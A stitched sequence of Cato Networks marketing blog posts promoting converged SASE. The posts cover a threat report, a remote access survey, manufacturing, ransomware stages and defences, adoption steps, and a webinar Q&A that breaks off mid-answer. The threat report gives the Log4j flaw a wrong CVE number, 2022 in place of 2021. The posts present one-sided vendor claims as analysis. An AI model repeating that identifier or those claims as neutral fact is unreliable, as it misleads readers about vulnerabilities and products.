Increased Complexity - Integrated solutions add management layers, which reduces agility. Integration does not deliver the required SASE capabilities and requires more effort and risk from the customer. This is the opposite of what Gartner envisioned SASE to be.
Poor Performance - SASE solutions that rely on integration can’t provide a single-pass architecture. Single Pass is critical for SASE’s promise of high performance because all engines process and simultaneously applies policies to traffic flows at the cloud edge. Integrated solutions do not have this single-pass architecture, so they are vulnerable to higher latency issues.
Limited Vendor Control - Some vendors with an incomplete SASE solution will partner with other technology vendors to build their offerings. This means each vendor only controls and supports their product, and customers subsequently are left with multiple security technologies to deploy and manage. Because of the numerous risks this creates, including security blind spots, customers will not enjoy the full promise of SASE.
Security Gaps - Technology integration increases the chance of security events being ignored or overlooked. Because each product in an integrated architecture is configured to inspect certain activities within traffic flows, they view it in its own context. This leads to insufficient sharing of all necessary context, thus leaving networks exposed to security gaps.
Lack of Full Visibility - Integrated offerings tend to rely on multiple consoles and sources that prevent accurate correlation of network and security traffic flows and events. Because of this, customers do not have full visibility and context of these flows and will not have the same level of control that a converged SASE solution has.
What are the Benefits of Converged SASE?
Converged SASE is built from the ground up to deliver both security and networking capabilities. This benefits the customer in the following areas:
Rapid Deployment - Integrated solutions have longer deployments since they have multiple consoles and multiple policies that require extensive manual effort from the customer and this risks policy mismatches or other errors during the deployment. A converged architecture, on the other hand, simplifies deployments with a single management application for configuration and a single policy for all customer sites. This makes the deployment less complex, allowing quick and easy implementation.
Decreased Overhead - Converged SASE provides a single management application for management and reporting that decreases administrative overhead and simplifies investigation and troubleshooting.
Low Latency - A true single-pass architecture decreases latency by ensuring all security engines simultaneously inspects and applies policies on all traffic once at the cloud edge before forwarding on to its destination.
Cloud-Native Possibilities - Solutions that are born in the cloud are purpose-built for scalability, agility, flexibility, resilience and global performance. This is unlike cloud-delivered solutions that are virtual machines based on appliance-based products that are deployed in public cloud provider data centers,
No Hybrid or On-Premises Deployments - SASE was defined by Gartner as being delivered from a cloud-native platform. Vendors that offer hybrid or on-premises options are not cloud-native and customers should proceed with caution and remember the core requirements of SASE when considering those options.
[boxlink link="https://www.catonetworks.com/resources/integrated-vs-converged-sase-why-it-matters-when-ensuring-an-optimal-security-posture/"] Integrated vs. Converged SASE: Why it Matters When Ensuring an Optimal Security Posture | Download the White Paper [/boxlink]
Integrated vs. Converged SASE
Which type of solution is best for modern enterprises? Here are the main functionalities offered by each type of solution:
SD-WAN from partners
Multiple management consoles
Require VM deployment
Require tunnel configuration
Hosted in the public cloud
Separate authentication flows for security and access
Require SIEM for network and security event correlation
Networking, security and remote access products are separate
Requires multiple products
Different PoPs offer different capabilities
A single management application
Full mesh connectivity
Optional use of IPSEC tunnels
Optional export to SIEM
Better collaboration among converged technologies
Holistic security protections
All PoPs are fully capable
There is consistent policy enforcement
Which Vendor Should You Choose?
There is are fundamental differences in SASE capabilities between an integrated and a converged platform. This includes their ability to eliminate MPLS, simplify and optimize remote access, enable easy cloud migration, and securing branch and mobile users. SASE solutions are designed to address numerous customer use cases and solve multiple problems, and it is important for customers to conduct a thorough evaluation of both approaches to ensure their chosen platform meets their current and future business and technology needs.
Read more about how to choose a SASE vendor from the whitepaper.
We recently issued the Cato Networks SASE Threat Research Report, which highlights cyber threats and trends based on more than 1.3 trillion flows that passed...
Cato Analyzes the Dominant Sources of Threats in 2H2022 Research Report We recently issued the Cato Networks SASE Threat Research Report, which highlights cyber threats and trends based on more than 1.3 trillion flows that passed through the Cato SASE Cloud network during the second half of 2022. The report highlights the most popular vulnerabilities that threat actors attempted to exploit, and the growing use of consumer applications that may present a risk to the enterprise.
Cato Scans a Vast Trove of Data to Hunt for Threats
One of the first observations in the report was the sheer scale of our data repository. Cato’s convergence of networking and security provides unique visibility on a global scale into both legitimate enterprise network usage and the malicious activity aimed at enterprise networks. This includes hostile network scans, exploitation attempts, and malware communication to C&C servers.
Like many security vendors, we collect information from threat intelligence feeds and other security resources. But as a networking provider, we’re also able enrich our understanding of security events with network flow data often unavailable to security professionals. During 2022, Cato’s data repository was fed by more than 2.1 trillion network flows traversing or our global private backbone or about a 20% growth in flows each quarter.
Security events, threats, and incidents also grew in proportion to the number of network flows. In the second half of 2022, the Cato Threat Hunting System (CTHS) detected 87 billion security events across the entire Cato Cloud. A security event is any network flow that triggers one of Cato’s many security controls.
[boxlink link="https://www.catonetworks.com/resources/eliminate-threat-intelligence-false-positives-with-sase/"] Eliminate Threat Intelligence False Positives with SASE | Download the eBook [/boxlink]
CTHS is a natural extension of Cato Cloud security services. It is comprised of a set of algorithms and procedures developed by Cato Research Labs that dramatically reduces the time to detect threats across enterprise networks. CTHS is not only incredibly accurate but also requires no additional infrastructure on a customer’s network.
CTHS concluded there were 600,000 threats, or high-risk flows, based on machine learning and data correlation. Of these, 71,000 were actual incidents, or verified security threats.
Cato Identifies the Top Threats and Exploit Attempts on the Network
Over the years, Cato has been tracking the top threats on the network and the trends haven’t changed much. The top five threat types in the current research report are (1) Network Scan, at 31.2 billion events, (2) Reputation, at 4.7 billion events, (3) Policy Violation, at 1.3 billion events, (4) Web Application Attack, at 623 million events, and (5) Vulnerability Scan, with 482 million events.
Other types of threats worth noting include Remote Code Execution (92 million), Crypto Mining (56 million), and Malware (55 million). Remote Code Execution events and Malware events both increased over the previous reporting period, but Crypto Mining events decreased. This latter fact may be due to the recent decline in the cryptocurrency business itself following the collapse of the FTX exchange.
The most-used cloud apps in the reporting period were from Microsoft, Google, Apple, Amazon (AWS), and Meta (Facebook). Many consumer-oriented applications were also in use, including YouTube, TikTok, Spotify, Tor, Mega, and BitTorrent. The latter three apps are known to be used frequently for malicious activities and pose a potential risk to enterprise networks.
The Log4j vulnerability (CVE-2022-44228) is a relatively recent discovery that is estimated to have affected nearly a third of all web servers in the world. Thus, it’s no surprise that it continues to dominate exploitation attempts with 65 million events across the Cato Cloud network. What is surprising is that two older vulnerabilities continue to make the top five list for exploit attempts. One is CVE-2017-9841, a remote code execution bug from 2017, and the other is CVE-2009-2445, a 14-year old vulnerability affecting certain popular web servers.
Cato also tracks network flows associated with MITRE ATT&CK techniques. Network based scanning and remote system discovery lead the list with 22.6 billion flows and 17 billion flows, respectively. The top five most-used techniques targeting enterprises are Phishing, Phishing for Information, Scanning, Remote System Discovery, and Exploit Public-facing Application. Knowing which attack techniques are most often seen on the network can help organizations tighten their defenses where it is most needed.
For more detailed information, read the Cato Networks SASE Threat Research Report for the second half of 2022.
Unsolved Remote Access Challenges Continue to Propel SASE in 2023, Finds New Cato Survey By all accounts, 2023 is expected to see strong growth in...
Unsolved Remote Access Challenges Continue to Propel SASE in 2023, Finds New Cato Survey Unsolved Remote Access Challenges Continue to Propel SASE in 2023, Finds New Cato Survey
By all accounts, 2023 is expected to see strong growth in the SASE market. Gartner has already predicted in The Top 5 Trends in Enterprise Networking and Why They Matter: A Gartner Trend Insight Report (subscription required) that by 2025, 50% of SD-WAN purchases will be part of a single vendor SASE offering, up from less than 10% in 2021. And in a recent audience poll at Gartner’s I&O Cloud conference, audience members were asked which of the five technologies were they most likely to invest in, 31% indicated SASE, making number two overall just behind Universal ZTNA (at 34%).
And Gartner isn’t the only one expecting SASE to perform well this year. Dell’Oro expects the SASE market to reach $8 billion in 2023. The drivers for this activity? The need for security everywhere particularly driven by hybrid work. “The internet is now a logical extension of the corporate network, and the need for security is as great as ever,” Dell’Oro Research Director Mauricio Sanchez told SDxCentral.
We couldn’t agree more. We just finished surveying more than 1661 IT leaders around 2023 SASE drivers for adoption. The survey gathered insight into their experiences with SASE and, for those who have not yet deployed SASE, the IT challenges confronting them moving forward.
What’s so striking when you look the data is the role remote access plays. More than half (51%) of respondents who have not yet adopted any kind SASE point to enabling remote access from anywhere as their number one challenge. The same is true for “Adopt zero trust security posture for all access.”
Why Remote Access VPNs Are Not the Answer for Hybrid Work
There are any number of reasons for why enterprises are looking at replacing legacy remote access solutions. “Traditional approaches anchored only to on-premises solutions at the corporate internet gateway no longer work in the new ‘anywhere, anytime, with any device’ environment that the pandemic accelerated, SDxCentral quoted Sanchez.”
[boxlink link="https://www.catonetworks.com/resources/have-it-the-old-way-or-enjoy-the-sase-way/"] Have it the Old Way or Enjoy the SASE Way | Download the White Paper [/boxlink]
More specifically, legacy VPNs suffer from five key problems:
Scaling and capacity Issues. VPN servers have a limited amount of capacity, as more users connect, performance degrades, and the user experience suffers. To increase VPN server capacity, IT must deploy new appliances or upgrade existing ones. Security and performance optimization challenges requires additional appliances to be purchased, deployed, and integrated, which only increases network complexity.
Lack of granular security controls. Generally, point solutions restrict access at the network-level. Once a user authenticates, they have network access to everything on the same subnet. This lack of granular security and visibility creates a significant risk and leaves gaps in network visibility.
Poor performance. All too often, remote users complain about their sluggishness of corporate application when access remotely. Part of that is an architecture issue, particularly when traffic needs to brought back to an inspection point, adding latency to the session. VPN traffic is also susceptible to the unpredictability and latency of Internet routing.
Rotten user experience. Remote users struggle with connecting using legacy VPN software. Too many parameters have to be configured to connect properly. Where once this might have been tolerated by a small subset of remote users, it becomes a very different story when the entire workforce operates remotely.
Growing security risk. VPN infrastructure itself has all too frequently been the target of attack. A brief search in the MITRE CVE database for “VPN Server” shows 622 CVE records. VPN servers showed so many security vulnerabilities that CERT warned that many VPN devices were storing session cookies improperly.
It shouldn’t be surprising to learn, then, that when we asked IT leaders further down the SASE adoption curve as to what triggered their SASE transformation project, “remote access VPN refresh” was the most common response (46%)
SASE: The Answer to the Hybrid Work Challenge
SASE answers those challenges by enabling work to occur anywhere, securely and efficiently. As part of a SASE platform, remote access benefits from the scaling of a cloud-native architecture. There’s no need to add server resources to accommodate of users who suddenly need remote access. “Deployment was quick. In a matter of 30 minutes, we configured the Cato mobile solution with single-sign-on (SSO) based on our Azure AD,” says Edo Nakdimon, senior IT manager at Geosyntec Consultants, who had more than 1200 users configured for remote access in less than an hour with the Cato SASE Cloud.
Zero-trust is just part of the SSE pillar of a single-vendor SASE platform, giving IT granular control over remote user resource access. Security is improved by eliminating the VPN servers so frequently and object of attack. And remote user performance improves by inspecting traffic in the PoP right near the user’s location and then sending traffic out to other location across the SASE platform’s global optimized backbone not the unpredictable Internet.
No wonder those IT leaders who did adopt SASE, indicated they were able to address the remote access challenge. When asked, “As a SASE user what are the key benefits you got from SASE?” “Enable Remote Access from Anywhere” as the highest ranked benefit (57% of respondents) followed by “Adopt zero trust security posture for all access” at 47% of respondents.
All of which makes remote access a “quick win” for anyone looking to deploy SASE.
Industry 4.0 is revolutionizing the manufacturing industry as we are witnessing numerous innovative technologies such as AI, IoT, and Robotic Process Automation (RPA) helping manufacturers...
SASE in Manufacturing: Overcoming Security and Connectivity Challenges Industry 4.0 is revolutionizing the manufacturing industry as we are witnessing numerous innovative technologies such as AI, IoT, and Robotic Process Automation (RPA) helping manufacturers enhance their supply chain, logistics and production lines. While we see these operations evolving into smart factories, the industry still faces challenges that could adversely impact its ability to realize the full potential of Industry 4.0.
Manufacturing Digital Transformation Challenges
Digital Transformation introduces a number of challenges to the manufacturing industry. These include:
Cybersecurity vulnerabilities - The manufacturing industry is especially vulnerable to cyberattacks. Legacy manufacturing systems were not designed to defend against modern-day cyber attacks. Their legacy architecture makes it difficult to remain current on software patches and fixes, and this exposes them to increased risk of security breaches. Additionally, lacking proper visibility and control of all traffic flows makes it virtually impossible to have a rapid response and remediation of threats to the environment.
Lack of flexible, scalable and reliable architectures - Manufacturers require a flexible, scalable and reliable architecture that can easily and cost-effectively scale as the business grows. This is something that MPLS does not provide because it cannot support the cloud evolution that the manufacturing industry is experiencing. Additionally, global expansion is a major challenge due to the cost and complexity of turning up new sites, especially in locations where MPLS is not easy for carriers to offer and support. And while some may deploy SD-WAN to overcome this, it is not suitable for global use cases, something the industry demands.
Cloud Performance - MPLS makes connecting directly to 3rd party SaaS applications impossible for 2 key reasons: MPLS is a point-to-point technology, whereas SaaS traffic flows between cloud providers, so it is not feasible for cloud use; and, SaaS apps like Microsoft 365, FactoryTalk, SAP and others, require high-performance internet access, and this is something MPLS does not provide.
Complicated tool management - Maintaining and monitoring multiple MPLS connections, telecom vendors, and legacy tools is extremely complicated, frustrating and prone to errors. This becomes even more challenging when integrating technology from acquisitions.
Global disconnect - Most manufacturers have global operations, with their HQ, production, engineering, suppliers and sales dispersed across the globe. All these users need secure, high-performance local, remote and global access to enable the business to run, which is hard to deliver over MPLS.
[boxlink link="https://www.catonetworks.com/resources/firsthand-perspectives-from-5-manufacturing-it-leaders-about-their-sase-experience/"] Firsthand Perspectives from 5 Manufacturing IT Leaders about their SASE Experience | Download the eBook [/boxlink]
The Solution to Manufacturing Challenges: SASE
SASE (Secure Access Service Edge) is an innovative approach to networking and security that converges these technologies into a single, global, cloud-native service that enables enhanced security, consistent policy enforcement, and faster threat response times. With SASE, manufacturers can overcome the above mentioned challenges that plagues many factories during their digital transformation journey.
To support this journey, manufacturers need a new solution: SASE. With SASE, enterprise networking and security technologies are converged into a single cloud-native software stack and delivered over a global backbone where all capabilities operate in unison. SASE allows manufacturers to reduce the risk of cybersecurity breaches while delivering reliable, low latency, global access to applications and systems. The following capabilities are crucial for SASE to deliver on its promise:
A Single Network Architecture
SASE, having its own global backbone, enables authorized users, locations, clouds and applications to reliably and consistently connect at anytime and from anywhere in the world.
The SASE cloud enables IT teams to instantly scale, optimize and enhance the network according to business requirements, and this ensures reliable and predictable performance for applications and a rich experience for all users.
Cloud Data Architecture
SASE optimizes traffic and routes it along the best path to its destinateion based on WAN optimization and dynamic routing policies. This ensures low latency cloud access for all users.
SASE strengthens the security posture by providing all required security capabilities including Zero Trust Network Access (ZTNA), firewall-as-a-service (FWaaS), cloud-access security broker (CASB), DLP and secure web gateway (SWG).
ZTNA in SASE ensures only authenticated and authorized users and devices gain access to critical enterprise business applications. To further extend security protection and coverage, Managed Detection and Response (MDR) is also available.
Consistent Access for Mobile Users and Suppliers
All authorized users receive consistent access, performance, and security no matter where they are.
What’s Next for Manufacturers?
SASE allows manufacturers to focus their time and resources on key business initiatives such as global expansion and enhancing factory operations instead of worrying about IT and security. This allows them to do what they do best, while maintaining peace of mind that their network and security needs are covered.
To learn more about SASE and manufacturing, listen to the podcast episode “How to implement SASE in manufacturing: A discussion with PlayPower”.
Many organizations struggle with an array of security point products that create security gaps, alert overload, and inconsistent policy configuration and enforcement challenges. As a...
February 20, 2023
Security Convergence in the Cloud: Protect More, Worry Less Many organizations struggle with an array of security point products that create security gaps, alert overload, and inconsistent policy configuration and enforcement challenges. As a result, many companies realize the benefit of moving toward an enhanced security platform that combines multiple security technologies into a single solution.
There are two approaches to achieve this:
Integration: The security platform is built by connecting together several existing solutions to achieve the desired functionality.
Convergence: The security platform is built from the ground up, with a single software stack that natively integrates all of the desired security functionality.
Convergence and integration can both be used to build a security platform. However, the two approaches work very differently and produce different results.
Where Security Integration Falls Short
Integration is a common approach to building security platforms because a vendor may already have the required pieces in its product suite. By cobbling them together into a single offering, they build something that appears to solve the problems that companies face.
However, security platforms developed via integration have several common flaws, including:
Policy Mismatches: Individual security tools are designed to solve specific problems. By definition, policy mismatches can exist between these tools in an integrated security platform, so they may not work properly.
Blind Spots: Individual security tools don’t view traffic flow in the same context, so a security incident captured by one tool may not trigger on another tool. Further, these tools do not effectively share a similar context of traffic flow. This causes coverage blind sports which leave organizations exposed and at risk for cyber attacks.
Decreased Efficiency: Integrated security tools are built of solutions with a defined set of features. Cobbling multiple tools together may create inefficiencies where multiple tools perform the same function.
False Alarms: Context is essential to differentiate between true threats and false positives. An array of tools that all look at threats independently and then share information may generate false positives that a holistic platform would not.
Interoperability Challenges: Existing tools have different code bases and policy constructs that may create challenges when trying to integrate multiple tools. These challenges can impact security coverage, security enforcement consistency, and architecture scalability, just to name a few.
Integration can build an all-in-one security solution. However, these platforms are much more likely to have significant issues that won’t exist in a converged solution.
Cloud-Native Convergence is the Key to Improved Security
Cloud migration has a significant impact on corporate IT architecture and security. Cloud adoption increases the distribution and scalability of IT infrastructure and makes IT environments more complex. As a result, it is more difficult to secure these environments, especially when users are distributed as well. So, security convergence is essential for security teams to keep pace with their responsibilities.
[boxlink link="https://www.catonetworks.com/resources/achieving-zero-trust-maturity-with-cato-sse-360/"] Achieving Zero Trust Maturity with Cato SSE 360 | Download the White Paper [/boxlink]
As corporate IT architecture expands to the cloud, an on-prem, perimeter-focused security architecture no longer makes sense. Optimizing network performance without compromising security requires moving security to where users and IT assets are: The cloud. Corporate systems hosted in the cloud take advantage of cloud scalability, which also places strain on their security infrastructure. As a result, corporate security must be not only cloud-delivered but cloud-native. This allows security to scale with the growth of the business.
Corporate environments are changing rapidly, and these changes make security more complex. Converged, cloud-native solutions are the key to improving the security of all aspects of an organization’s IT architecture.
Security Convergence with Cato SSE 360
Cato has long been committed to improving security through cloud-native convergence. Cato’s SASE Cloud and SSE 360 are cloud-native solutions that offer a range of converged security functions, including Cloud Access Security Broker (CASB), Cloud Secure Web Gateway (SWG), Firewall-as-a-Service (FWaaS), Intrusion Prevention Systems (IPS), and Zero-Trust Network Access (ZTNA).
Cato SSE 360’s converged security offers a range of benefits for organizations, including:
Improved Security Collaboration: As a converged security solution, Cato SSE 360’s security functions were designed to operate collectively. This means better collaboration between security technologies, which leads to tighter security coverage and improved outcomes.
Context Sharing: Different security technologies offer different insights for threat detection and classification. A converged security solution like Cato SSE 360 can share context more effectively because each technology has the same context, captured from the same traffic flow. This dramatically improves threat detection and response.
Faster Threat Response: Security convergence improves the quality of security data and enables SOC analysts to investigate and respond to incidents from a single solution. As a result, they can more quickly identify and remediate potential threats.
Reduced Blind Spots: Cato SSE 360 was designed as a single, converged security software stack from the beginning. This dramatically reduces blind spots when compared to solutions built from several integrated, standalone products.
More Efficient Operations: A converged security solution is more efficient because it eliminates redundant technologies. Additionally, it makes security operations centers (SOCs) more efficient by providing fewer, higher-quality alerts and enabling SOC analysts to more efficiently analyze and respond to potential threats.
360-Degree Security Coverage: Cato SSE 360 offers 360-degree security visibility and coverage.
Configurable Security: As a Security-as-a-Service (SECaaS) solution, Cato SSE 360 provides the right amount of security when an organization needs it. Cloud scalability enables rapid expansion to address increase in capacity requirements as the company grows.
Defending the Modern Enterprise with Cato SSE 360
Cato SSE 360 protects the modern enterprise from cyber threats by offering the most comprehensive network security solution in a converged, cloud-native architecture. To learn more about how Cato SSE 360 can help improve your organization’s security, sign up for a free demo today.
Ransomware continues to be a prime cyber threat to organizations of all sizes. One thesis for this is that these attacks are easier and less...
February 16, 2023
A SASE Approach to Enterprise Ransomware Protection Ransomware continues to be a prime cyber threat to organizations of all sizes. One thesis for this is that these attacks are easier and less expensive to execute than ever before, while offering very high rates of return for cybercriminals. Since the 2017 WannaCry epidemic, the ransomware industry has evolved through several stages, including:
Large-Scale Campaigns: Ransomware attacks like WannaCry were designed to infect as many systems as possible. Each infection would demand a relatively small ransom, trying to make a profit via quantity over quality.
Targeted Attacks: Over time, ransomware campaigns have evolved to be extremely targeted attacks against particular organizations. In-depth research allows cybercriminals to identify how to maximize their profits for each infection.
Ransomware as a Service (RaaS): RaaS gangs distribute copies of their malware to affiliates for a cut of the profits of successful infections. This model increased the number of companies infected with high-quality ransomware.
Double Extortion: Double extortion ransomware both steals and encrypts sensitive and valuable data on an infected system. The threat of a data leak is used to increase the probability of a ransom payment.
Triple Extortion: Triple extortion expanded the impact of a ransomware attack from the infected organization to its customers. The ransomware operators demand payments from multiple organizations whose data is affected by the attack.
Ransomware has proven to be a highly effective and profitable cyber threat. Cybercriminals will continue to innovate and build on their success to improve attack profitability and the probability of ransom payments.
Common Attack Methods for Ransomware Attacks
Cybercriminals use various methods to deploy and execute ransomware, and the following are a small sample of the most common:
Vulnerability Exploits: Unpatched vulnerabilities are a very common method for delivering ransomware. By exploiting these vulnerabilities, cybercriminals can plant and execute the malware on a vulnerable system.
Phishing: Phishing attacks use social engineering to trick users into downloading and executing malware on their devices. The ransomware can be attached to the message or located on a phishing site indicated by a malicious link.
Compromised Credentials: User credentials can be guessed, compromised by phishing, or breached in other ways. Cybercriminals can use these credentials with the remote desktop protocol (RDP) or virtual private networks (VPNs) to access and deploy malware on systems.
Malicious Downloads: Phishing sites may offer ransomware files for download. These files could masquerade as legitimate software or exploit vulnerabilities in the user’s browser to download and execute themselves.
Stages of a Ransomware Attack
Ransomware follows many of the same steps as other types of malware. The main stages in an attack include the following:
Initial Infection: A ransomware attack starts with the malware gaining access to a target system. This can be accomplished via a variety of methods, such as phishing or the use of compromised credentials.
Command and Control: Once the ransomware achieves execution, it establishes a command and control (C2) channel with its operator. This allows the ransomware to send data to and receive instructions from its operator.
Lateral Movement: Ransomware rarely immediately lands on a device containing the high-value data that it plans to encrypt. After gaining a foothold on a corporate network, the malware will perform discovery and move laterally to gain the access and privileges needed to encrypt valuable and sensitive data.
Data Theft and Encryption: Once it gains the required access, the malware will begin encrypting data and deleting backups. It may also exfiltrate copies of the data to its operator via its C2 channel.
Ransom Note: Once data encryption has been completed, the malware will reveal its presence on the system by publishing a ransom note. If the ransom is then paid and the decryption key is provided, the ransomware would decrypt all of the files that were encrypted.
[boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help/"] Ransomware is on the Rise – Cato’s Security as a Service can help | Download the eBook [/boxlink]
Ransomware Prevention Strategies
Once data theft and encryption have begun, an organization’s ransomware remediation options are limited. However, companies can take steps to reduce the probability of a ransomware infection, including the following:
Vulnerability Management: Regular vulnerability scanning and patching can help to close the security gaps exploited to deliver ransomware. Additionally, Web Application and API Protection (WAAP) solutions can block the attempted exploitation of unpatched vulnerabilities.
Email Security: Another common method of delivering ransomware and other malware is phishing. Email security solutions can identify and block messages containing malicious attachments or links to phishing pages.
Multi-Factor Authentication (MFA): Compromised credentials can be used to access corporate systems and deliver malware via remote access solutions. Deploying strong MFA increases the difficulty of using compromised credentials.
Web Security: Ransomware can be downloaded intentionally or unintentionally from malicious sites. A secure web gateway (SWG) can block browsing to dangerous sites and malicious downloads.
Endpoint Security: Ransomware is malware that runs and encrypts files on an infected endpoint. Endpoint security solutions can identify and remediate ransomware infections.
Cato’s Approach to Enterprise Ransomware Protection
Using machine learning algorithms and the deep network insight of the Cato SASE Cloud, we’re able to detect and prevent the spread of ransomware across networks without having to deploy endpoint agents. Infected machines are identified and immediately isolated for remediation.
Cato has a rich multilayered malware mitigation strategy of disrupting attacks across the MITRE ATT&CK framework. Cato’s antimalware engine prevents the distribution of malware in general. Cato IPS detects anomalous behaviors used throughout the cyber kill chain. Cato also uses IPS and NextGen Anti-Malware to detect and prevent MITRE ATT&CK techniques used by common ransomware groups, which spot the attack before the impact phase. And, as part of this strategy, Cato security researchers follow the techniques used by ransomware groups, updating Cato’s defenses, and protecting enterprises against exploitation of known vulnerabilities in record time.
We use heuristic algorithms specifically designed to detect and interrupt ransomware. The machine-learning heuristic algorithms inspect live SMB traffic flows for a combination of network attributes including:
Blocking the delivery of known malware files.
Detecting command and control traffic and attempts at lateral movement.
Identifying access attempts for remote drives and folders.
Monitoring time intervals, such as encrypting drives in seconds.
Cato Networks provides detection and mitigation of ransomware attacks without deploying agents on endpoints. Learn more about Cato’s network-based ransomware protection.
SASE adoption requires business and technological planning. By properly preparing for the transition, you will be able to successfully move your business-critical networking and security...
February 16, 2023
6 Steps to SASE Adoption SASE adoption requires business and technological planning. By properly preparing for the transition, you will be able to successfully move your business-critical networking and security capabilities to a vendor-delivered service. You will also have the answers to any board and leadership questions.
What does a good SASE adoption plan look like? Below we list six steps that will take you from start to finish. By following them, you can ensure a frictionless transition. (Please note that some of these steps can be executed simultaneously). For more details about each step and how to execute them, read our complete guide, here.
Step 1: Preparation
The first step is to understand what problems you are trying to solve. Do you want to eliminate appliances? Migrate from MPLS to secure SD-WAN? Maybe you need to secure your hybrid cloud or multi-cloud? By determining your drivers you will be able to prioritize functions, allocate the required budget and evaluate vendors and architectures. Once you have your list of use cases, map out which capabilities you need for each one. This will help you identify the right vendor for you, since capabilities vary among them.
Finally, determine your required security coverage. It is recommended to choose a vendor with NGFW, SWG and NextGen anti-malware capabilities. Additional capabilities that will improve your security posture are IPS, DLP, CASB and zero-day/polymorphic threat prevention.
[boxlink link="https://www.catonetworks.com/resources/how-to-adopt-sase-in-6-easy-steps/"] How to Adopt SASE in 6 Easy Steps | Download this eBook [/boxlink]
Step 2: Planning and Timeline
Once your use cases and required capabilities are mapped out, you can create a plan for implementing them. Adjust the plan to realistic timelines. Make sure to include considerations like contractual obligations, national holidays, how quickly you wish to deploy and the geographical dispersion of your network.
Step 3: RFI/RFP
Now that the groundwork is set, you can start evaluating vendors. Prepare an RFI or RFP that will help you determine which SASE provider provides the capabilities you need and at the cost you need.
Step 4: Budget and Board Approval
After planning, it’s also time to get leadership approval for the project. Be sure to include a complete business case that maps technical capabilities to drivers and cost savings. You can also add quantifiable metrics that are relevant to your specific business context.
Step 5: PoC
After slimming down your vendor list to one or two recommended ones, you can move forward with a proof of concept. Formulate a clear proof of concept plan in advance, to set clear expectations with vendors. It’s recommended to cap the PoC timeline at thirty days.
Make sure your PoC has the capabilities and the presence that matter to you, including geographical locations, performance and optimization, security coverage and platform cohesiveness.
Step 6: Implementation
You made it! You can now move forward with your front-runner vendor and complete the purchase process. Plan the implementation together with them, since you two are partners now, working together for future success.
Ready to Get Started?
SASE has eliminated the need to perform expensive, time-consuming hardware refreshes, while also ensuring seamless performance, feature enhancements and daily security updates. To learn more about how to get started, review the entire SASE adoption plan, here.
Introduction Since Gartner introduced the Secure Access Service Edge (SASE) category in 2019, interest from enterprises has grown substantially. SASE transforms enterprise IT through the...
February 14, 2023
Strategic Roadmap to SASE Introduction
Since Gartner introduced the Secure Access Service Edge (SASE) category in 2019, interest from enterprises has grown substantially. SASE transforms enterprise IT through the convergence of enterprise networking and network security into a single, cloud-native, service. It aims to optimize security posture, enable zero-trust access from anywhere, and reduce costs and complexity. Given its potential impact, SASE is becoming a strategic project for many organizations.
However, the widespread availability of SASE offering from different vendors and managed services providers is causing a great deal of confusion. Organizations are challenged to compare SASE feature sets and solutions and combine offering from multiple vendors - resulting in complex architectures that lead to incomplete service offerings that don’t meet needs and expectations.
Adopting SASE is an IT strategy targeted to accompany and enable rapid growth and digital transformation, not a tactic selection of a point product. As such, making the right selection is more critical than ever.
During the “2022 Strategic Roadmap to SASE” webinar, Gartner Research Vice President Neil Macdonald and Cato Networks CMO Yishay Yovel, discussed multiple aspects of SASE but most importantly reiterated the fundamental principles and expected benefits that are the basis of why SASE was introduced back in 2019.
[boxlink link="https://www.catonetworks.com/resources/inside-look-life-before-and-after-deploying-sase/?utm_medium=blog_top_cta&utm_campaign=before_and_after_sase"] An Inside Look: Life Before and After Deploying a SASE Service | Whitepaper [/boxlink]
Several questions were raised during the webinar; the most interesting and relevant ones are answered below. They cover the following areas:
What business and technical benefits does SASE provide?
When and how should you initiate your SASE project?
How can you deploy SASE gradually into your existing infrastructure?
How do different SASE architectures impact the expected business outcomes?
We hope these Q&A will be able to clear up some of the confusion around SASE and SSE and help organizations make the right decisions when selecting a SASE provider.
SASE market overview
1. Will SSE be replacing SASE in the short term?
No, SSE is just a stop in the journey to SASE. Today, some organizations are not yet ready to fully transition to SASE for various reasons, but they are ready to adopt SSE because they recognize the benefits in adopting cloud-delivered security services such as SWG, CASB, and ZTNA to protect their offices and remote users when accessing the public Internet. The final step in the journey will be to combine the SSE capabilities with the cloud-delivered connectivity and control services such as SD-WAN and FWaaS to complement Internet security and provide the best performances and protection when accessing corporate assets.
2. Why is the security industry generally so fragmented, and will it consolidate or splinter more in the next 5 years?
The trend is clearly towards vendor consolidation. Organizations of all sizes are looking to simplify their infrastructure and operations to become more agile. They are favoring vendors that can combine multiple security and networking functionalities in a single platform, rather than best of breed solutions. This is confirmed by a recent Gartner survey that showed that 75% of organizations are pursuing security vendor consolidation and rising to 90% by Year End 2022. That’s a stunning increase if we compare to just 29% back in 2020.
3. What are the upcoming changes in SASE that experts foresee?
SASE is calling for vendor consolidation. Gartner, in its latest report "Market Guide for Single-Vendor SASE", has explicitly restated the need to unify all SASE capabilities into ideally one single vendor or at best into two vendors that must be fully integrated. We expect a limited list of vendors to stand out in the SASE market leadership and we expect companies to accelerate their initiatives towards network and security cloud-based services to reduce infrastructure complexity, optimize their CAPEX and OPEX and better control security across all their data, users and applications.
4. What techniques work best on informing senior leadership; assisting them with understanding, approving, and adopting a SASE technology?
When talking to senior leadsership about the value of SASE, put the emphasis on the benefits that a SASE approach brings to companies in their digital transformation journey:
Simplicity - by reducing infrastructure complexity
Productivity - by providing an improved and consistent user experience
Efficiency - by reducing the overall infrastructure budget
Agility - shifting network and security skills from managing boxes to policies supporting the digital workplace
SASE Migration and adoption
5. What pre-requisites and steps are needed to transition successfully to a sustainable SASE?
Break down the organizational silos – network and security teams must work in concert in the name of speed, agility and reduction of complexity
Choose a SASE vendor that meets the SASE architectural requirements (cloud-native, converged, global & support for all edges)
Map future HW and SW refresh to the SASE vendor capabilities
Plan the transition project to start with low-risk areas to minimize friction
6. What components of SASE will be important in the SMB market now and in the next 5 years? ZTNA? CASB? SD-WAN? SMB?
Aside from the specific SASE features (which of course are important and depend on the specific business case), SMBs, probably more than any other organization, will look to adopt SASE solutions that provide the following characteristics and benefits:
These characteristics are typically delivered by cloud-native SASE vendors that offer an "As-a-Service" approach to networking and security.
7. Do you have a blueprint or reference architecture for an 80% cloud, 20% on-prem environment with multiple SaaS applications?
Regarding the 80/20 split, this is just marketing. Every enterprise is different, and so is every vendor. At Cato, we believe we should deliver as much as we can from the cloud and as little as we can from on-prem. Our 1500+ customers agree with us.
Cato SASE vs other SASE solutions
8. Which are the main benefits of the Cato SASE solution compared to a managed SASE offered by a Telco?
A Telco managed SASE service is normally a conglomeration of point solutions wrapped around a telco managed blanket. Some customers may consider this "black-box" approach but be wary of the following:
